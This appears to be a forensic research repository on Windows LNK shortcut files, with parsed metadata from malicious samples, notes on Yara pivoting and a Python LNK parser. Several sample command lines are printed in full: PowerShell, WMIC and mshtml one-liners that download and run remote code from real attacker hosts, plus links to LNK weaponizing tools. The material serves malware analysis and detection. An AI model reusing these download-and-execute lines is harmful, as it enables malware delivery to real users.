├── .gitattributes
├── README.md
├── astaroth.txt
├── foo2.tst
├── foo2.vbs
├── links.txt
├── lnk.zip
├── make_lnk.txt
├── notes.txt
├── other.txt
└── toolmarks.txt

--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
# Auto detect text files and perform LF normalization
* text=auto

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# LNK

foo2.vbs - VB script to create an LNK file for calc.exe

foo2.tst - output of foo2.vbs

make_lnk.txt - minimal LNK file to launch calc.exe

lnk.zip - LNK parser updated 20220831 (EXE and Perl run-time DLL)

--------------------------------------------------------------------------------
/astaroth.txt:
--------------------------------------------------------------------------------
LNK file associated with Astaroth
https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research

Astaroth LNK:
https://www.virustotal.com/gui/file/3a6c84b00170aea3028dcf9fbdeaaa5141468874573ce6797a1eba0025aad62f/details
https://hybrid-analysis.com/sample/3a6c84b00170aea3028dcf9fbdeaaa5141468874573ce6797a1eba0025aad62f?environmentId=100

Metadata:
guid            {00021401-0000-0000-c000-000000000046}
mtime           Sat Jul 16 11:42:42 2016 Z
atime           Sat Jul 16 11:42:42 2016 Z
ctime           Sat Jul 16 11:42:42 2016 Z
basepath        C:\Windows\System32\rundll32.exe
shitemidlist    My Computer/C:\/Windows/System32/rundll32.exe
**Shell Items Details (times in UTC)**
  C:2016-07-16 06:04:26  M:2017-04-06 19:20:00  A:2017-04-06 19:20:00  Windows (9)
  C:2016-07-16 06:04:26  M:2017-04-06 23:52:58  A:2017-04-06 23:52:58  System32 (9)
  C:2016-07-16 11:42:44  M:2016-07-16 11:42:44  A:2016-07-16 11:42:44  rundll32.exe (9)
vol_sn          ECCD-85F4
vol_type        Fixed Disk
commandline     javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://hardx.thaieasydns.com/01/Seu7.sct");
iconfilename    %SystemRoot%\system32\imageres.dll
hotkey          0x244
showcmd         0x1

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasLinkInfo|HasArguments|HasIconLocation|HasRelativePath

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

***TrackerDataBlock***
Machine ID            : ideia
New Droid ID Time     : Thu Apr 6 19:51:48 2017 UTC
New Droid ID Seq Num  : 8849
New Droid Node ID     : 82:c2:28:09:30:bb
Birth Droid ID Time   : Thu Apr 6 19:51:48 2017 UTC
Birth Droid ID Seq Num: 8849
Birth Droid Node ID   : 82:c2:28:09:30:bb

--------------------------------------------------------------------------------
/foo2.tst:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/keydet89/LNK/8a2e7bc02503fa67f91d403dddf0ef0e1b3e7575/foo2.tst

--------------------------------------------------------------------------------
/foo2.vbs:
--------------------------------------------------------------------------------
' Create a shortcut to calc.exe through the WScript.Shell COM object.
' "\foo2.lnk" is written to the root of the current drive.
set w = CreateObject("Wscript.shell")
set l = w.CreateShortcut("\foo2.lnk")
l.TargetPath = "c:\windows\system32\calc.exe"
l.Save

--------------------------------------------------------------------------------
/links.txt:
--------------------------------------------------------------------------------
Links

LNK binary format
https://msdn.microsoft.com/en-us/library/dd871305.aspx

Shell Item format specification
https://github.com/libyal/libfwsi/blob/master/documentation/Windows%20Shell%20Item%20format.asciidoc

Property Store format definitions
https://github.com/libyal/libfwps/blob/master/documentation/Windows%20Property%20Store%20format.asciidoc

Government warning that includes the use of LNK files:
https://www.ncsc.gov.uk/news/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control

2017 Trend Micro blog post regarding the trend of using LNK files
https://blog.trendmicro.com/trendlabs-security-intelligence/rising-trend-attackers-using-lnk-files-download-malware/

2017 ThreatPost blog article regarding Stuxnet and the use of LNK files
https://threatpost.com/stuxnet-lnk-exploits-still-widely-circulated/125089/

2015 Hexacorn blog post regarding the use of HotKeys in LNK files
http://www.hexacorn.com/blog/2015/03/13/beyond-good-ol-run-key-part-29/

Links for creating LNKs (useful for toolmark testing):
Tricky.lnk
https://github.com/xillwillx/tricky.lnk

https://www.uperesia.com/booby-trapped-shortcut-generator

Thanks to Matt @ bitofhex:
https://github.com/Plazmaz/LNKUp
https://github.com/it-gorillaz/lnk2pwn

--------------------------------------------------------------------------------
/lnk.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/keydet89/LNK/8a2e7bc02503fa67f91d403dddf0ef0e1b3e7575/lnk.zip

--------------------------------------------------------------------------------
/make_lnk.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/keydet89/LNK/8a2e7bc02503fa67f91d403dddf0ef0e1b3e7575/make_lnk.txt

--------------------------------------------------------------------------------
/notes.txt:
--------------------------------------------------------------------------------
This file contains the metadata of several LNK files available online.

The two "cozy" LNK files were retrieved as a result of this FireEye blog post:
https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html

LNK #1:
file: d:\cases\cozy\cozy\coz

guid            {00021401-0000-0000-c000-000000000046}
mtime           Tue Jul 14 01:14:24 2009 Z
atime           Mon Jul 13 23:32:37 2009 Z
ctime           Mon Jul 13 23:32:37 2009 Z
basepath        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
description     ds7002.pdf
shitemidlist    My Computer/C:\/Windows/System32/WindowsPowerShell/v1.0/powershell.exe
**Shell Items Details (times in UTC)**
  C:2009-07-14 02:37:06  M:2016-02-16 18:50:36  A:2016-02-16 18:50:36  Windows (8)
  C:2009-07-14 02:37:08  M:2018-11-02 10:25:58  A:2018-11-02 10:25:58  System32 (8)
  C:2009-07-14 04:52:32  M:2009-07-14 04:52:32  A:2009-07-14 04:52:32  WindowsPowerShell (8)
  C:2009-07-14 04:52:32  M:2016-02-16 18:50:44  A:2016-02-16 18:50:44  v1.0 (8)
  C:2009-07-13 23:32:38  M:2009-07-14 01:14:26  A:2009-07-13 23:32:38  powershell.exe (8)
vol_sn          C4B2-BD1C
vol_type        Fixed Disk
commandline     -noni -ep bypass $zk='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';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;
iconfilename    C:\windows\system32\shell32.dll
hotkey          0x0
showcmd         0x7

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasExpIcon|HasLinkInfo|HasArguments|HasName|HasIconLocation|HasRelativePath

***PropertyStoreDataBlock***
SID: S-1-5-21-1764276529-1526541935-4264456457-1000

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

***TrackerDataBlock***
Machine ID            : user-pc
New Droid ID Time     : Thu Oct 6 17:03:04 2016 UTC
New Droid ID Seq Num  : 13273
New Droid Node ID     : 08:00:27:92:24:e5
Birth Droid ID Time   : Thu Oct 6 17:03:04 2016 UTC
Birth Droid ID Seq Num: 13273
Birth Droid Node ID   : 08:00:27:92:24:e5


LNK #2
file: d:\cases\cozy2\cozy2

guid            {00021401-0000-0000-c000-000000000046}
mtime           Tue Jul 14 01:14:24 2009 Z
atime           Mon Jul 13 23:32:37 2009 Z
ctime           Mon Jul 13 23:32:37 2009 Z
basepath        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
shitemidlist    My Computer/C:\/Windows/System32/WindowsPowerShell/v1.0/powershell.exe
**Shell Items Details (times in UTC)**
  C:2009-07-14 02:37:06  M:2016-02-16 18:50:36  A:2016-02-16 18:50:36  Windows (8)
  C:2009-07-14 02:37:08  M:2016-11-08 22:00:34  A:2016-11-08 22:00:34  System32 (8)
  C:2009-07-14 04:52:32  M:2009-07-14 04:52:32  A:2009-07-14 04:52:32  WindowsPowerShell (8)
  C:2009-07-14 04:52:32  M:2016-02-16 18:50:44  A:2016-02-16 18:50:44  v1.0 (8)
  C:2009-07-13 23:32:38  M:2009-07-14 01:14:26  A:2009-07-13 23:32:38  powershell.exe (8)
vol_sn          C4B2-BD1C
vol_type        Fixed Disk
commandline     -noni -ep bypass -win hidden $s = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('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'));iex $s;
iconfilename    C:\Windows\System32\shell32.dll
hotkey          0x0
showcmd         0x7

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasExpIcon|HasLinkInfo|HasArguments|HasIconLocation|HasRelativePath

***PropertyStoreDataBlock***
SID: S-1-5-21-1764276529-1526541935-4264456457-1000

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

***TrackerDataBlock***
Machine ID            : user-pc
New Droid ID Time     : Thu Oct 6 17:03:04 2016 UTC
New Droid ID Seq Num  : 13273
New Droid Node ID     : 08:00:27:92:24:e5
Birth Droid ID Time   : Thu Oct 6 17:03:04 2016 UTC
Birth Droid ID Seq Num: 13273
Birth Droid Node ID   : 08:00:27:92:24:e5


https://twitter.com/DissectMalware/status/1043407573821677568
https://www.hybrid-analysis.com/sample/695e03c97eaed0303c9527e579e69b1ba280c448476edcf97d7a289b439fa39a?environmentId=100
MD5: 0b12bdcfa497422aedf092729325ff6d

guid            {00021401-0000-0000-c000-000000000046}
description     44OFxmd8rhESizmd7i26IOKcvjd7gt6IFqcv
shitemidlist    My Computer/C:\/WINDOWS/system32/cmd.exe
  C:0  M:0  A:0 Z  WINDOWS (9)
  C:0  M:0  A:0 Z  system32 (9)
  C:0  M:0  A:0 Z  cmd.exe (9)
commandline     /k start /MIN %SystemRoot%\\system32\\wbem\\WMIC.exe os get /format:"http://t9UHncbrj.iceyavod.com:25073/03/vv.xsl?13102507390dOIrmxm" && exit
iconfilename    %SystemRoot%\system32\imageres.dll
hotkey          0x0
showcmd         0x7

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasArguments|HasName|HasIconLocation

***PropertyStoreDataBlock***
SID: S-1-5-21-1051504378-1802116228-1550938009-1001

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

Notes: No TrackerDataBlock; confirmed that the time stamps in the shell items are zeroed
out.

# updated 20220831
https://malcat.fr/blog/lnk-forensic-and-config-extraction-of-a-cobalt-strike-beacon/

File: d:\cases\lnk2\cs.txt
guid            {00021401-0000-0000-c000-000000000046}
mtime           Sun Jun 12 14:46:28 2022 Z
atime           Thu Jun 30 04:21:18 2022 Z
ctime           Sun Jun 12 14:46:28 2022 Z
workingdir      E:\downloads
basepath        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
shitemidlist    My Computer/C:\/Windows/System32/WindowsPowerShell/v1.0/powershell.exe
**Shell Items Details (times in UTC)**
  C:2019-12-07 09:03:46  M:2022-06-30 02:09:28  A:2022-06-30 04:11:22  Windows (9) [179356/3]
  C:2019-12-07 09:03:46  M:2022-06-30 03:11:46  A:2022-06-30 04:11:56  System32 (9) [181379/3]
  C:2019-12-07 09:14:54  M:2019-12-07 09:14:54  A:2022-06-30 01:05:26  WindowsPowerShell (9) [182401/3]
  C:2019-12-07 09:14:54  M:2022-06-13 03:35:36  A:2022-06-30 03:03:40  v1.0 (9) [182402/3]
  C:2022-06-12 14:46:30  M:2022-06-12 14:46:30  A:2022-06-30 04:03:48  powershell.exe (9)
vol_sn          BA2E-9690
vol_type        Fixed Disk
commandline     -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://120.48.85.228:80/favicon'))"
hotkey          0x0
showcmd         0x1

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasWorkingDir|HasLinkInfo|HasArguments|EnableTargetMetadata

***PropertyStoreDataBlock***
GUID/ID pairs:
{28636aa6-953d-11d2-b5d6-00c04fd918d0}/30   ParsingPath: E:\downloads\Dû÷N1→ éYUO(W*N♫zAPP
Nî[►bGlù{♣n4⌂▼ .pdf
{446d16b1-8dad-4870-a748-402ea43d788c}/104  VolumeID: {a577bd74-42b7-4ee4-998a-0c216bb8c11f}
{b725f130-47ef-101a-a5f1-02608c9eebac}/10   ItemNameDisplay: Dû÷N1→ éYUO(W*N♫zAPP
Nî[►bGlù{♣n4⌂▼ .pdf
{b725f130-47ef-101a-a5f1-02608c9eebac}/12   Size: 232486
{b725f130-47ef-101a-a5f1-02608c9eebac}/14   DateModified: Thu Jun 30 03:22:00 2022 Z
{b725f130-47ef-101a-a5f1-02608c9eebac}/15   DateCreated : Thu Jun 30 03:21:58 2022 Z
{b725f130-47ef-101a-a5f1-02608c9eebac}/4    ItemType: Microsoft Edge PDF Document
{e3e0584c-b788-4a5a-bb20-7f5a44c9acdd}/6    ItemFolderPathDisplay: E:\♂N}Å

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

***TrackerDataBlock***
Machine ID            : desktop-3l400cr
New Droid ID Time     : Thu Jun 30 02:09:19 2022 UTC
New Droid ID Seq Num  : 12611
New Droid Node ID     : 00:50:56:c0:00:08
Birth Droid ID Time   : Thu Jun 30 02:09:19 2022 UTC
Birth Droid ID Seq Num: 12611
Birth Droid Node ID   : 00:50:56:c0:00:08

--------------------------------------------------------------------------------
/other.txt:
--------------------------------------------------------------------------------
Metadata from weaponized LNK files can provide insight into the actor's development
environment. The SID identifies the user account used, and can be used as a search
string (as well as in a Yara rule). The volume serial number, machine ID (aka NetBIOS
name), and node ID (aka MAC address) can also be used in a Yara rule. The first three
bytes of the node ID (the OUI) can also show whether the LNK was built inside a virtual
machine: 08:00:27 is VirtualBox and 00:50:56 is VMware, and both appear among the
samples in notes.txt.

-------------------------------------------------------------------------------------
https://www.virustotal.com/gui/file/3b4ec70681e528663dee39c5c6ebceec2b7ddf09707a78df20cae3b7b807fac5/detection
MD5: 5d357f666e7727b18f8150d53d28d257

Metadata:
guid            {00021401-0000-0000-c000-000000000046}
mtime           Wed Apr 11 23:35:27 2018 Z
atime           Wed Apr 11 23:35:27 2018 Z
ctime           Wed Apr 11 23:35:27 2018 Z
workingdir      %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
basepath        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
description     AVI
shitemidlist    My Computer/C:\/Windows/System32/WindowsPowerShell/v1.0/powershell.exe
**Shell Items Details (times in UTC)**
  C:2018-04-11 21:04:34  M:2018-11-16 21:29:56  A:2018-11-16 21:29:56  Windows (9)
  C:2018-04-11 21:04:34  M:2018-11-21 17:32:02  A:2018-11-21 17:32:02  System32 (9)
  C:2018-04-11 23:38:22  M:2018-04-11 23:38:22  A:2018-06-28 23:05:46  WindowsPowerShell (9)
  C:2018-04-11 23:38:22  M:2018-06-28 23:04:20  A:2018-06-28 23:04:20  v1.0 (9)
  C:2018-04-11 23:35:28  M:2018-04-11 23:35:28  A:2018-04-11 23:35:28  powershell.exe (9)
vol_sn          CA05-2569
vol_type        Fixed Disk
commandline     -NoPr -WINd 1 -eXEc ByP iex ("$( SeT-ITeM 'VariaBle:OFS' '')"+[StRING][CHAr[]] (73 ,69, 88, 40, 78,101 , 119 , 45, 79 ,98,106,101 , 99,116,32 ,83,121,115 ,116 ,101 ,109, 46, 78 , 101,116,46,87 , 101, 98 ,67,108 ,105 , 101 , 110 , 116, 41,46 , 68,111 ,119 ,110, 108, 111,97 , 100, 83 , 116 ,114,105,110,103 ,40, 39, 104 ,116 ,116,112,58 ,47 ,47,107 ,108 ,105, 115 ,46 ,105 , 99 , 117,47 ,49 , 39,41)+"$(SEt-VARiAbLe 'OfS' ' ' ) ")
iconfilename    C:\WINDOWS\System32\imageres.dll
hotkey          0x0
showcmd         0x7

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasWorkingDir|HasExpIcon|HasLinkInfo|HasArguments|HasName|HasIconLocation|HasRelativePath

***PropertyStoreDataBlock***
GUID/ID pairs:
{446d16b1-8dad-4870-a748-402ea43d788c}/104
{46588ae2-4cbc-4338-bbfc-139326986dce}/4    SID: S-1-5-21-1607665944-3235443811-1991609163-1001

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

***TrackerDataBlock***
Machine ID            : x10-slim
New Droid ID Time     : Sun Jul 29 22:57:38 2018 UTC
New Droid ID Seq Num  : 5969
New Droid Node ID     : e8:9e:b4:3a:a3:ea
Birth Droid ID Time   : Sun Jul 29 22:57:38 2018 UTC
Birth Droid ID Seq Num: 5969
Birth Droid Node ID   : e8:9e:b4:3a:a3:ea

Note: the [CHAr[]] array in the command line above decodes to
IEX(New-Object System.Net.WebClient).DownloadString('http://klis.icu/1')

-------------------------------------------------------------------------------------
https://www.virustotal.com/gui/file/695e03c97eaed0303c9527e579e69b1ba280c448476edcf97d7a289b439fa39a/detection
https://hybrid-analysis.com/sample/695e03c97eaed0303c9527e579e69b1ba280c448476edcf97d7a289b439fa39a?environmentId=100
MD5: 0b12bdcfa497422aedf092729325ff6d

Note: In this LNK file, the time stamps within the shell items were visually/manually
verified as being zeroed out. There also appear to be other modifications to the file,
as well as a description field.

Metadata:
guid            {00021401-0000-0000-c000-000000000046}
description     44OFxmd8rhESizmd7i26IOKcvjd7gt6IFqcv
shitemidlist    My Computer/C:\/WINDOWS/system32/cmd.exe
**Shell Items Details (times in UTC)**
  C:0  M:0  A:0  WINDOWS (9)
  C:0  M:0  A:0  system32 (9)
  C:0  M:0  A:0  cmd.exe (9)
commandline     /k start /MIN %SystemRoot%\\system32\\wbem\\WMIC.exe os get /format:"http://t9UHncbrj.iceyavod.com:25073/03/vv.xsl?13102507390dOIrmxm" && exit
iconfilename    %SystemRoot%\system32\imageres.dll
hotkey          0x0
showcmd         0x7

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasArguments|HasName|HasIconLocation

***PropertyStoreDataBlock***
GUID/ID pairs:
{46588ae2-4cbc-4338-bbfc-139326986dce}/4    SID: S-1-5-21-1051504378-1802116228-1550938009-1001

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

-------------------------------------------------------------------------------------
LNK available for download:
https://iris-h.services/#/pages/workbench/19cd922cac02acd24b7b6c3d01df5b0b29f52eab

This LNK file is interesting in that the actual command run is appended to the end
of the LNK file itself; the command line only locates it, using findstr to search
every .lnk under the user's profile for lines containing the word "dikona", which is
used throughout the script, and hands the matches to powershell. Windows Defender
detects this LNK file as BITS abuse, as the embedded script uses bitsadmin.exe to
download a file.

MD5: 877a283be8cd033a144f9d3324e7a0b0

Metadata:
guid            {00021401-0000-0000-c000-000000000046}
mtime           Tue Jul 14 01:39:20 2009 Z
atime           Mon Jul 13 23:49:07 2009 Z
ctime           Mon Jul 13 23:49:07 2009 Z
basepath        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
shitemidlist    My Computer/C:\/Windows/System32/WindowsPowerShell/v1.0/powershell.exe
**Shell Items Details (times in UTC)**
  C:2009-07-14 03:20:10  M:2018-09-07 06:18:28  A:2018-09-07 06:18:28  Windows (8)
  C:2009-07-14 03:20:12  M:2018-09-07 06:12:28  A:2018-09-07 06:12:28  System32 (8)
  C:2009-07-14 05:32:40  M:2009-07-14 05:32:40  A:2009-07-14 05:32:40  WindowsPowerShell (8)
  C:2009-07-14 05:32:40  M:2016-12-19 11:50:30  A:2016-12-19 11:50:30  v1.0 (8)
  C:2009-07-13 23:49:08  M:2009-07-14 01:39:22  A:2009-07-13 23:49:08  powershell.exe (8)
vol_sn          9CBC-E47E
vol_type        Fixed Disk
commandline     -ep bypass -c "&{powershell -w"in hi"d"den -c {$g=findstr /s dikona $env:userprofile\*.lnk;powershell -c $g}}"
iconfilename    shell32.dll
hotkey          0x73
showcmd         0x7

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasLinkInfo|HasArguments|HasIconLocation|HasRelativePath

***PropertyStoreDataBlock***
GUID/ID pairs:
{46588ae2-4cbc-4338-bbfc-139326986dce}/4    SID: S-1-5-21-2287413414-4262531481-1086768478-1000

***KnownFolderDataBlock***
GUID  : {1ac14e77-02e7-4e5d-b744-2eb1ae5198b7}
Folder: CSIDL_SYSTEM

***TrackerDataBlock***
Machine ID            : pc
New Droid ID Time     : Fri Sep 9 16:24:17 2016 UTC
New Droid ID Seq Num  : 7251
New Droid Node ID     : 08:d4:0c:47:f8:73
Birth Droid ID Time   : Fri Sep 9 16:24:17 2016 UTC
Birth Droid ID Seq Num: 7251
Birth Droid Node ID   : 08:d4:0c:47:f8:73

-------------------------------------------------------------------------------------
Below is the metadata for "make_lnk.lnk", a custom-crafted LNK file that includes only the
minimum required for a functioning LNK file. The LNK file metadata was further modified to
remove the time stamps from the shell items, and to change the version number of the shell
items.

The file can be found here: https://github.com/keydet89/LNK/blob/master/make_lnk.txt
Note that the file extension was changed to "txt".

File: d:\cases\lnk\make_lnk.lnk
guid            {00021401-0000-0000-c000-000000000046}
shitemidlist    My Computer/C:\/Windows/System32 /calc.exe
**Shell Items Details (times in UTC)**
  C:0  M:0  A:0  Windows (10)
  C:0  M:0  A:0  System32 (10)
  C:0  M:0  A:0  calc.exe (10)
hotkey          0x0
showcmd         0x1

***LinkFlags***
HasLinkTargetIDList|IsUnicode

--------------------------------------------------------------------------------
/toolmarks.txt:
--------------------------------------------------------------------------------
This file illustrates several native means for creating shortcuts on Windows systems,
and the metadata extracted from the resulting Windows shortcut files.
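The fields other.txt singles out for pivoting (volume serial number, machine ID, node ID) and the fields the toolmark comparisons below turn on (LinkFlags, hotkey, showcmd, working directory) all sit at fixed places in the MS-SHLLINK layout, so they can be pulled without a full shell item or property store decoder. The script below is an added example written for this page; it is not the Perl parser shipped in lnk.zip and did not produce any of the metadata listed in this repo. It parses the header, the LinkInfo VolumeID, the StringData fields and the TrackerDataBlock, decodes the UUIDv1 object GUID of the Droid into the time, sequence number and MAC shown in the notes, and turns the result into a Yara rule. The shortcut it parses is constructed in memory: the machine ID "enzo", MAC 5c:26:0a:24:29:6f and volume serial 22D3-06AE are taken from the toolmark samples in this file as sample values, while the Droid volume GUID, the shell item bytes and the hotkey (Ctrl+D) are placeholders. The LinkTargetIDList is skipped rather than decoded, and the PropertyStoreDataBlock, where the SID lives, is not parsed.

```python
"""Toolmark extractor for MS-SHLLINK (.lnk) files. Added example, not the
repo's Perl parser; the shortcut it parses is constructed in memory."""
import struct
import uuid
from datetime import datetime, timedelta, timezone

LINK_FLAGS = ("HasLinkTargetIDList HasLinkInfo HasName HasRelativePath HasWorkingDir HasArguments "
              "HasIconLocation IsUnicode ForceNoLinkInfo HasExpString RunInSeparateProcess Unused1 "
              "HasDarwinID RunAsUser HasExpIcon NoPidlAlias Unused2 RunWithShimLayer ForceNoLinkTrack "
              "EnableTargetMetadata DisableLinkPathTracking DisableKnownFolderTracking DisableKnownFolderAlias "
              "AllowLinkToLink UnaliasOnSave PreferEnvironmentPath KeepLocalIDListForUNCTarget").split()  # bit 0 upward
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
TRACKER_SIG = 0xA0000003                                  # TrackerDataBlock signature
FT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)      # FILETIME base
UUID_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)  # UUIDv1 base
TS = "%a %b %d %H:%M:%S %Y"

def decode_hotkey(value):
    """HotKeyFlags: low byte is a virtual-key code, high byte holds Shift/Ctrl/Alt bits."""
    key, mods = value & 0xFF, value >> 8
    name = (chr(key) if 0x30 <= key <= 0x39 or 0x41 <= key <= 0x5A else
            f"F{key - 0x6F}" if 0x70 <= key <= 0x87 else
            {0: "none", 0x14: "CAPSLOCK", 0x90: "NUMLOCK"}.get(key, f"VK_{key:#04x}"))
    return "".join(m for b, m in ((1, "Shift+"), (2, "Ctrl+"), (4, "Alt+")) if mods & b) + name

def decode_droid(guid_le):
    """The object GUID of a Droid is a UUIDv1: 100ns timestamp, clock sequence and MAC."""
    u = uuid.UUID(bytes_le=guid_le)
    when = UUID_EPOCH + timedelta(microseconds=u.time // 10)
    return {"time": when.strftime(TS) + " UTC", "seq": u.clock_seq,
            "node": ":".join(f"{(u.node >> s) & 0xFF:02x}" for s in range(40, -1, -8))}

def parse_lnk(data):
    """Return the fields the notes in this repo list for each sample."""
    h = struct.unpack_from("<I16sIIQQQIIIHHII", data)
    if h[0] != 0x4C or uuid.UUID(bytes_le=h[1]) != LNK_CLSID:
        raise ValueError("not a shell link")
    flags, off = h[2], 0x4C
    info = {"flags": [n for i, n in enumerate(LINK_FLAGS) if flags >> i & 1],
            "mtime": (FT_EPOCH + timedelta(microseconds=h[6] // 10)).strftime(TS) + " Z",
            "showcmd": h[9], "hotkey": decode_hotkey(h[10])}
    if flags & 0x01:                                  # LinkTargetIDList: skipped, not decoded
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & 0x02:                                  # LinkInfo: VolumeID + LocalBasePath
        li_size, _, li_flags, vol_off, base_off = struct.unpack_from("<IIIII", data, off)
        if li_flags & 0x01:
            _, drive, serial, _ = struct.unpack_from("<IIII", data, off + vol_off)
            info["vol_sn"] = f"{serial >> 16:04X}-{serial & 0xFFFF:04X}"  # one LE DWORD on disk
            info["vol_type"] = {2: "Removable", 3: "Fixed Disk", 4: "Remote"}.get(drive, str(drive))
            info["basepath"] = data[off + base_off:data.index(b"\x00", off + base_off)].decode("latin-1")
        off += li_size
    for bit, name in ((2, "description"), (3, "relativepath"), (4, "workingdir"),
                      (5, "commandline"), (6, "iconfilename")):  # StringData, fixed order
        if flags >> bit & 1:
            n, width = struct.unpack_from("<H", data, off)[0], 2 if flags & 0x80 else 1
            info[name] = data[off + 2:off + 2 + n * width].decode("utf-16-le" if width == 2 else "latin-1")
            off += 2 + n * width
    while off + 8 <= len(data) and data[off:off + 4] != b"\x00" * 4:   # ExtraData until TerminalBlock
        size, sig = struct.unpack_from("<II", data, off)
        if sig == TRACKER_SIG:    # Length, Version, MachineID[16], Droid[32], DroidBirth[32]
            body = data[off + 8:off + size]
            info["machine_id"] = body[8:24].split(b"\x00")[0].decode("latin-1")
            info["droid"] = decode_droid(body[40:56])  # object GUID of Droid; DroidBirth's is body[72:88]
        off += size
    return info

def yara_rule(info, name="lnk_dev_environment"):
    """Pivot on the creator's environment: NetBIOS name as text, MAC and volume
    serial as the raw bytes they occupy on disk."""
    serial = " ".join(f"{b:02x}" for b in int(info["vol_sn"].replace("-", ""), 16).to_bytes(4, "little"))
    mac = info["droid"]["node"].replace(":", " ")
    return (f"rule {name} {{\n  strings:\n    $machine = \"{info['machine_id']}\"\n"
            f"    $mac = {{ {mac} }}\n    $serial = {{ {serial} }}\n"
            f"  condition:\n    uint32(0) == 0x4C and 2 of them\n}}")

def make_droid(when, seq, node):
    ticks = (when - UUID_EPOCH) // timedelta(microseconds=1) * 10
    obj = uuid.UUID(fields=(ticks & 0xFFFFFFFF, (ticks >> 32) & 0xFFFF, ((ticks >> 48) & 0x0FFF) | 0x1000,
                            0x80 | (seq >> 8 & 0x3F), seq & 0xFF, node))
    return uuid.UUID(int=1).bytes_le + obj.bytes_le   # placeholder volume GUID + UUIDv1 object GUID, LE on disk

def build_sample_lnk():
    """Constructed calc.exe shortcut carrying the 'enzo' toolmarks quoted in toolmarks.txt."""
    ft = (datetime(2018, 4, 11, 23, 34, 36, tzinfo=timezone.utc) - FT_EPOCH) // timedelta(microseconds=1) * 10
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID.bytes_le, 0xA3, 0x20,   # flags: IDList|LinkInfo|Args|Unicode
                         ft, ft, ft, 27648, 0, 1, 0x0244, 0, 0, 0)   # showcmd 1, hotkey Ctrl+D
    items = [b"\x1f" + b"\x50" * 19, b"\x2fC:\\" + b"\x00" * 19, b"\x31calc.exe\x00"]  # placeholder shell items
    idlist = b"".join(struct.pack("<H", 2 + len(i)) + i for i in items) + b"\x00\x00"
    volume = struct.pack("<IIII", 0x11, 3, 0x22D306AE, 0x10) + b"\x00"   # DRIVE_FIXED, serial, empty label
    base = b"C:\\Windows\\System32\\calc.exe\x00"
    body = volume + base + b"\x00"                    # VolumeID, LocalBasePath, CommonPathSuffix
    link_info = struct.pack("<IIIIIII", 0x1C + len(body), 0x1C, 1, 0x1C, 0x1C + len(volume),
                            0, 0x1C + len(volume) + len(base)) + body
    args = "-ep bypass".encode("utf-16-le")
    droid = make_droid(datetime(2018, 9, 18, 10, 39, 24, tzinfo=timezone.utc), 7175, 0x5C260A24296F)
    tracker = struct.pack("<IIII16s", 0x60, TRACKER_SIG, 0x58, 0, b"enzo") + droid + droid
    return (header + struct.pack("<H", len(idlist)) + idlist + link_info
            + struct.pack("<H", len(args) // 2) + args + tracker + b"\x00" * 4)
```

To run it against a real sample, call parse_lnk(open(path, "rb").read()) and feed the result to yara_rule. The hex strings in the rule are the on-disk form of the identifiers: the MAC is the last six bytes of each Droid object GUID in the same order it prints, while the volume serial is a single little-endian DWORD, so 22D3-06AE has to be searched as ae 06 d3 22.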

-------------------------------------------------------------------------------------
Visual Basic Script #1

set w = CreateObject("Wscript.shell")
set l = w.CreateShortcut("\foo.lnk")
l.WindowStyle = 4
l.TargetPath = "c:\windows\system32\calc.exe"
l.Hotkey = "Capital"    ' Caps Lock (VK_CAPITAL, 0x14)
l.Save

Metadata:
guid            {00021401-0000-0000-c000-000000000046}
mtime           Wed Apr 11 23:34:36 2018 Z
atime           Wed Apr 11 23:34:36 2018 Z
ctime           Wed Apr 11 23:34:36 2018 Z
basepath        C:\Windows\System32\calc.exe
shitemidlist    My Computer/C:\/Windows/System32/calc.exe
**Shell Items Details (times in UTC)**
  C:2018-04-11 21:04:34  M:2018-08-14 20:41:02  A:2018-08-14 20:41:02  Windows (9)
